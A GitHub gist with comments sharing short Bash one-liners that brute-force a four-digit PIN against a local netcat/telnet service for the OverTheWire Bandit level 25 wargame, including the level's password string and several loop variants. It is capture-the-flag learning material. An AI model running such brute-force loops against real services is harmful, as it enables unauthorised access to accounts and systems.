Skip to content

Instantly share code, notes, and snippets.

@vinzdef
Last active October 5, 2022 06:29
Show Gist options
  • Save vinzdef/7bdf4249e67a2ff7ed3f to your computer and use it in GitHub Desktop.
Save vinzdef/7bdf4249e67a2ff7ed3f to your computer and use it in GitHub Desktop.
4 digit pin bruteforce using Bash expansions for Over The Wire bandit25
for x in {0..9}{0..9}{0..9}{0..9}; do
echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $x | telnet localhost 30002 | egrep -v "Exiting|Wrong|I am";
echo "Try $x";
done
@cstrouse
Copy link

seq -f %04g 10000 | xargs printf "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ %s\n" | nc localhost 30002 | grep bandit25

@rjsprague
Copy link

Fieel's answer is by far the best.
I combined all of the steps into a single script with 2 second sleeps between the major steps and I got the password much faster than some of the other solutions. It is interesting that netcat can handle so many attempts at once. It's almost like it was designed for brute forcing...
I guess I could have actually made the txt files from inside the script and made them writable as well to improve on the script.

for a in {0..9}{0..9}{0..9}{0..9}; do
echo $passwd' '$a >> combinations.txt
done
sleep 2.0
cat combinations.txt | nc localhost 30002 >> result.txt
sleep 2.0
sort result.txt | uniq -u

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment